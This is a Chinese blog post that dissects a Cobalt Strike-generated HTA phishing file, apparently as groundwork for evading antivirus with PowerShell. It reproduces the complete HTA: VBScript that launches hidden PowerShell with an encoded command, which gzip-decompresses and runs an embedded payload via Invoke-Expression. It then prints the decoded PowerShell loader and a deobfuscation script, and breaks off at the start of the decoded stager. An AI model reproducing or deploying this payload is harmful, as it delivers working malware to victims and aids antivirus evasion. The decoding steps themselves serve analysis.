CS生成hta分析与powershell免杀

CS生成hta分析与powershell免杀

看着自己刚开始入门写的wp,才发现自己从来没正儿八经写过啥博客,最近遇到了一群朋友及其博客,于是准备记录一点有质量的内容

hta文件分析

hta文件是CS钓鱼经常会用到的一种攻击手法,但我从未考虑过里面的内容,今天突发奇想,想来看看里面到底写了些什么东西,并且杀毒软件是对于哪一部分进行了扫描并且报毒

1
2
3
4
5
6
7
8
9
10
11
<script language="VBScript">
	Function var_func()
		Dim var_shell
		Set var_shell = CreateObject("Wscript.Shell")
		var_shell.run "powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEALwA3AFYAWABhADIALwBpAFMAaABMADkASABIADYARgBQADAAUQBDAGEAdwBpAFgAWQBNAGgAagBWAHAASABHAGcAQQAwAEcANwBBAEQAbQB6AFUAVgBSAHUANwBzAHgASgBuADUAaAB0AHoASABtAHoAdgB6ADMATABSAHYASQB6AGUAdwBrAHUAeQBQAHQATABwAEoARgB1ADcAdQBxAHUAdQByAFUANgBlAHEAeQBUAHQAbQBOAHoAZwBJAEwATQA5AFUAagBsAEwAdQBaADAAQwBDADAAUABKAGUAcgA1AEgATABYAFQAVQA5AGgAMwBCAFAAMwBMAFoAOQBiAFIAeQA1AG0ANgBYAFEANgBlAEQARQBwAGUALwBFAEQARAA3ADgAZwBRAGcASQBhAGgAdAB4AGYAdQBhAHMAKwBDAHAARABEAEYAYQA3ADMASwBIAGgAeABQAEIATABaAHQATQBoAGwATAA2AGsAZwBKAFYARgBBACsAYQB1AHIAMwBGAFUAMgBGAGIAawBoAFcAdABNAFgARgB6AEYAcgBUADEAOABjAHkAagBZAGUAQwBXAEcAagB3AGwATAAwAC8AYQBiAG4ASQBNAHQAZABmAGYAMwBhAGkASQBLAEEAdQB1AHoAMABYAG0AcABSAEoAbwBZAGgAZABRAHoAYgBvAG0ARwBCADUANwA1AHoAMAB3ADAATgA2AE0AMgB6AHMAYQBXAFkAYwBYADkAeAAxAHkAKwBsAGwAdQAwAFoAeQBEADYATABKAFEAMgBFAE4AeABDAFEANgBKAEoAMAByAGUAZABoAGwARQBaAFEAMABuADMAYgBZAG8AWAA4AG4AMwAvAG0AKwBlAFgATgA3AGEAbwBrADcAUwBKAGsAaAA0AFcAOABuAG8AUwBNAE8AaQBWAGkAMgAzAG0AZQArADgARwBuAEcANAA0AFMAbgB4AGIAeQBxAG8AVQBEAEwALwBUAFcAcgBEAFMAMQBYAEsARgBTAEcAbQBmAGUAYQA1AG4AegA2AHMAbgAzAFAASAArAE8AegBQAFEAUgB4AFAARgA1AGsASwBuAFYAawAwADQAaABEADgATQArAFkAQwBPAGUATQBNAHcAWAB1AFcAVwA2ADMAMwBLADEANAByADYAOQBlAFQATwBNAFgARwBZADUAdABLAFMANABqAEEAYQBlAHIAOQBOAGcAYgAyAEUAYQBsAHQAcgBJAEoAVABZAGQAMABqAFcAbwA1AFUATgBJAG4AMgB2AG0AZQBYAEEAaQBvAEMAdwBLAFgATwA3AGkAQwArAGoAdAB2AFYAZABhAHUASABZAGoAMgB5ADYAQwAzAGUAWAB2ADIAbAAwAFYATgBCAHAAZgB3AFAAMQBkAHAAYwBKADcASgBaAEQAcQBzADQAQQB2AG4AagBuAHgATwAzAEMAbwBHAFcAOQBPADUAaQBDAGMAWAA3AHgALwBSAHkANABlAGYAcgA4AFEAagBNAC8AOQB5AEgAMQBBAFYAVQBKAHQAYQBpAEoARwBYAHgAagBnACsANAA2AHIAdQBhAHUAcgBaAFQAYQBrAEUARQArAGgANwA0AFYAVwBwAHYAZgBFAGwAWQB1AGMAQwBrADQAZwA1AGcAVgBKAG0AcwA1AFIARQBGAEYAKwA5AFgAZAArAFQAdAB0AGUATgBNAFAAaQBwADQAWgB1AEwAMQBwAG4AbgBWAE4ANgBUAG4ANAA4AGMAYwB1AEoAWgA1AEYAVgA3AG8AcgBQAG4AZABtAFQAegByADgAWQBrAFcAVQBUAEcAcQBUAHIAbgA1ACsARwBKAGwAMQBiAEwAbQAwAG0ATABuAEkAcwBmAEMARgA4ADQAYQBPAGMAMABiAFYATgBNAHoAeABLAEYAegBFAE4ALwBDAHoAawB6AHcAdQBVAE4ATQAvAG8ANQBGAE4AQQBsADcAKwBxAFMAWQA3AEYAMwBuAFQAcgBKACsAZABFAEQASABrAFAAdwBTAHUAZwBCAFAAKwB6AE0ANgBjAGMARgB2AEsASwBxADEASQBIADgARAB1ADkAQQAwADIAdgAxADMARABNADYARQBYADYAZgBMAFMAUwB5ACsANwBwAGUAOAByAGwAaABvADMAQwBzAE0AagAxAEkAegBqAG4AdQBNAGoAcABGAE4AbQBVAEYARABuAFIARABhADMAegBrAGgAZwB4AEwAeAB2AG0ALwAzAFoAWABqAFcAeABtAFkAUgBTAHkAaQA3AGsAVgAvAHcARwBrADUANgAwAGIAbgBnAHMAbgBKAHMASwBRAFgAWQBCAGgAcABQAHMAVQBXADgAaABPAFUAUwBsAHkAYgBZAHYAUQBlAHEASgBiADUAcwBXAEYALwBJAGUAWQBOAEoAQgB0AHcANQBFAEQAUwAzAHYASQBDAGMAeQBrAFcATwBnAHMANQBVAHgAQQBpAHYALwBLAEQANwA2AGsAVQA2AFkANAB2AGsAMABkAGsATQA2AHEAawBHAHcAagBFADIAcgBPACsAVQBSAGwAZABFAE0AbQBKAGYAbAAvADQALwBiAGwAbgBKAHcATwBSAFkAcgBWAEIAYQBSADMAVABnAE0AQgBkAE4AdABqAFIAVwA1AGkAQgBRAHoAcQBXAHIANwA0AEMALwBIACsATwAvAGQAKwBMAGoARQAvAHUAZABrAEkANgBEAG0AUgBoAGUAdwBnAEwAdQBzAEoAUwA0ADkATABKAG8AbgBUAHkAKwBYAHAARABjAHMATQB1AFkAQQBCAGEAbgBMAGcATwBYAFUAVQAwAHIAdQBxAG4AcABXAHgAUQBsADUANABpAEgAWgBLAG8AbQA0AEgAZAAwAEYATAAyAHMAdgB0AFgAVgBzAGEAdwBiAE8ASABSADkAagBKAFUAcQAvAFgARwBmAHIAMQBZAFEAOQBMADAAWABPAC8AWABlADYAcwBsAGMARgBEAHMAeAByAEYAawBSAEsATgA2AG0AVgBCAEwAbwBQAGMAYwBkAGUAUwAxAHMAcgArADIAWgB2AGYAUgBrADcAMQBsAHYAagBLAFgAbwBPADUAOABIADcAWABEAHAAdgBLAHYAaQBtADIASwB6AHQAUAB2AGoATwB0AHgANwBPAGQAawAvADcAQQBpAEcAKwBOAG0AUwBMAGYARwB5ADIANQAyAHAANgBFAGMAaQByAGYAVgB2AFoAMQBlAGQAZAA0ADkARwBEADgAaAA3AEoAdgBlAEIAMwBRAGUANwBqAHoAMwBYAHAATQBxAGwAVABxADMATgBGAFoARAA4AGMAQwBlADYARABJAFAAQwBUAGQAeQBSAGUAOQBmAE4AdQBhAEoARgBwAHYASQB2AG0AYQA3AHAASwBlAGMAVAB1AFEATwA5AHEAeABJAHIARgBEAG0AYgBTAEgAWgBTAEsARgBDAHoATABaAFMAVQBMAGYANgBQAG8AUQBwAHkASwBZACsAcAAzAGIAUwBYAFMAOQBuAHUAQgBYAE4AdABwAGEANgBoAGEAMwB0AFIANwBwADcAaAA1AHEANQBGAGgASgBaAEsAMABLAE8AQgB6ADAAUgBOADMATQA3ADgAZwBCAHoAKwBRAFkAegA3AFIAZQAwAHAANQByAEwAYgBDADcAaQA2AFoAbQB0AGEAMwBxAEEAdABqAFcAeQBTAEUAbQA0AC8AQwA1AE0AMgBKAHoAbwBZACsAYwBhAHAASwA0ADEAWQBhAHkAVgBRADQAOQA3AEwAUABKAHIASABNAFgAbwBLAFQAaAA5AHkAeABxADEATgBjAHMAMQBlADMAMABGAG0AYgBuAFUAVwBJAG4ALwAzAFIAOQBtAEIAQwB3AGIAYgBkAEgAegBTADcAWQBkAGgAdQBxAEMAcgBsAEEATgBaAG0ATwBRAGEAWQBiAFcAbQBEAHIASQBkAGcAcAA0AEcATgB5AHQAOABXAEMARgBxAHYARwBzAEsATwBOAEcAdQByAFUARQBEAHYASAB1AHEATgBaAFcARABCAG4AYQAwAEcAcgAwAGMATgA4ADEAaABDADAAeAA4AFoAbQBhAE0ANQBGAGIAegB3AHoAaQBZAE8AYwB1AG8AVQBIAHQAWgBoAFUATwBtAHgAUgA2AFIAdwBXAGMAYwAwAHkAWgBtAFIASABwAHYANgBCAHUATwBJAHoAcQBTAHgAaQBFAHQAZABzADUARAB3ADYAbwBrAG0AQwBSAGkAdgBzAEsASQBkAEYASwBMAHAAcQBTAHgARQBXAGcANgBFAHQAUABjADkAZgBoADYAMwBSAEIAQwAvAEUAUwBrADIAZABqAHYAMwArAHEASwB5AG8AYwBsAHcAZQBpAFQARQBUAFIAMQBKAHQATgBMAEIASgBkAHoAQgArAGIATABWAEUATABjAEkAdAAzAHgARQBQAG8AUwBZAGQAegBDAGEAQgBmAEEAegBMAGgALwBGAFkAMQBCAGkASgAxAFcAbAB6AHEATQB4AEYAZwBRAHoAMQBWADUATABhAHkAMgB5ADAAUgBGAFUAegBwAGcAdABCAHIATgBUADMAZQBLAEEATwBtADAATgBWAGsAegBmAHEAVwBCAG8ATwB1AGoAMwByAGQAUwBzADcAYwBRAFAASABpACsAMwBjADEAYQBxAHkAOABIAGkAawBzADMAQQBxAHgAKwB5ADQASABuAGoAagBlAFUAdgBzAHkAcwBDAGIAaABlAE8AYgBjADEAZAA2AHgAbQAxAGkARwBWAE4AaQA0AFMAbAArAG4AagB1ADMAQQBuAEkAbgBPAHoAeABiAHgARQAyAFgATwBMAGkATgBuAHgAZABUAGYANwA4AHcAbABUAGEASwBOADAARgBEAC8ALwAvAGoATgA2ADkAMABqAHIAUgBPAC8AcwBDAEMAZgBTADkAdgBjAEEAOABMADUAYQA3AGMAcQBwAHQAZwBuADkAWQByAGkAOQAyADgAMQBUAGsAMAAzAGIAbwBBAHYAcgBwAHoAVgAzAGEAYgBUAG8AZQBSAGkAbgArAEwAWABMAG0AQwB4AFoAcQB3AGcATABXAG0ATQA5AGsAWgBsAFgAbQBqAFgAZwBrAFYARgBBAE0AZQBsAHQAWQByADEAMQBDAGQAQQBFAC8AMQBxAGQAWgBUAGoAcwBEAG4AYwByAGgAVgBLAHUAcQBXAFMATwB4ACsASQB6AFIAYgB3AE0AUABZAEEAYgA0AEEAagA2AHcAdgBiAGkAZgBlAGgAYwBEAFQAUgBHADAAcQBpAFoAWgB5ADkAYwBCAFEAVQBNACsANABlAHIAdQAyAGQANAAyAEIAVgBlADAAYQAyADAAbQA0AHUASwArAHEAVQBWAGQAZwBSAHkAeAB0AFYAQgAxAHkATgBaAEEARwA1AFMASABrAFEAWgBPAEcAMABqAGkAdABEAC8AQQA4AHAAUgBWAHAANwBRAFgAUQBZAHgAegBTAGUALwBzAGYASABQAHoAZgAyAEkAeAA3AHEAegBsAFEAYQBhAEMASQBwAGYATgBmAHYAdgBEAHAAMwBmACsAMgBzAHIAdwArAHIAQwA2ADkAMgB0AHYANwBqAFgARQBBAGEAMABJAHQAcgBWAC8AWgB5AGgANgA5AHEAMQBxAGYATgBVAEEAcQBDAHMASQBOAHMAcQBHAGEAUQBSAE4AegB1AFkASgBrAEwANQBEAFAAcgBVAGoAZgBzADEASwBOAFEAdQBIAGoANwB2AG0AVgBCAGkANgAxAG8AYgBPAEUAMwB2AE4AUwB1AEUAWABiADkAbgBEAGEAUABIADMAUwB4AFUAQQByAGQAMgBxAHcAVgBuAEIAQgBqAFcARQBvAFYARAA0AGMAOABkAHkAYgBJAEgAUgBNAHAANQBpAE0AYQBMADMATwBHAG8AeAB6AGgASgBjACsANgB5AEwANAA5AGUAcwBDAHcAaQB1ACsAQQA3AEYASABYAFoATgB0AGkAbAB6ADUASQBKAFQATAA1AGYAUwAvAFcAdQBaAHoAdgB3ADkATAB3AC8ATwBUAHcAcAB1ADUAWQB0AHAAZwB2AGYAUABrAC8AVQA1ADIAdABoAE4ALwBSAGoAKwBJAFgASQBmACsARAB4AFAAdwAwADYAYgAvAEcAZABvAFUAdgBLAHgASABlADQATQB1AGMAKwBoAGoAdgBQAGgAYwAvAGwAcwB1AHAANgB5ADUAZAAvAE8AaABkAFkAUQB2AEUATAByAGoASABqAEwAdQBoAFUAQgAxAGQAcgBQADEARABQAGgAYwB5AGUANwBmAHcAagBYAGkATwBVAFcAYQBjAGQAZQBJACsAOABIAGQAUQBIAGgAaQBLAEYAVABnAG0AeQBVAHcAbwAvAFEAeQA1AGsANgBmAFkATgArADUARwBGAGsAbgB4AGUALwBjAGsARwBJAEsATABmAFIATgB4AHoATwBBAHAAUgBSADYAcQB0AFIAMABaAGkAUQBWAGgAcgBsAC8AQQB1ADcARABCAGoAUABUAEQAUQBBAEEAIgApACkAOwBJAEUAWAAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAkAHMALABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAOwA=", 0, true
	End Function

	var_func
	self.close
</script>

首先来看hta的源码,使用VBS写的,是一种微软环境下的轻量级的解释型语言,同时它又是asp动态网页默认的编程语言,但这个不是重点,其中最令我们关注的是写入shell命令中的这一长短base64编码的东西,我们先解码看看是什么

base64解码

解码完了之后是这一段,把.替换掉,得到这一段代码

1
$s=New-Object IOMemoryStream(,[Convert]::FromBase64String("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"));IEX (New-Object IOStreamReader(New-Object IOCompressionGzipStream($s,[IOCompressionCompressionMode]::Decompress)))ReadToEnd();

我们还是先把中间的一长串拿去base64解密,但结果是一堆乱码,可惜
那我们来看看其他的
其中有这几个函数比较值得关注

IOMemoryStream(,[Convert]::FromBase64String())将字符串base64编码后,存入到流中
IOCompressionGzipStream()使用Gzip压缩
最后通过Invoke-Expression(运行一个以字符串形式提供的 Windows PowerShell 表达式)将字符串当作命令执行

网上有现成的脚本,我们直接拿去跑试一下脚本原文链接

1
2
3
4
5
6
$data = [System.Convert]::FromBase64String('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')
$ms = New-Object System.IO.MemoryStream
$ms.Write($data, 0, $data.Length)
$ms.Seek(0,0) | Out-Null
$sr = New-Object System.IO.StreamReader(New-Object System.IO.Compression.GZipStream($ms, [System.IO.Compression.CompressionMode]::Decompress))
$sr.ReadToEnd() | set-clipboard

该脚本首先经过base64解码,然后再进行gzip解压,来得到我们想要看到的hta的源码

这里我犯了一个低级错误,在之前base64解码出来的结果里面,把多余的.都替换掉了,同时也将代码中原本的.也去掉了,故正确的代码应该长这样
当时也想到这个问题了,不知道为啥没有注意,挺怪的

1
$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("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"));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();

结果会自动保存在剪贴板里
得到解压后的源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
Set-StrictMode -Version 2

$DoIt = @'
function func_get_proc_address {
	Param ($var_module, $var_procedure)		
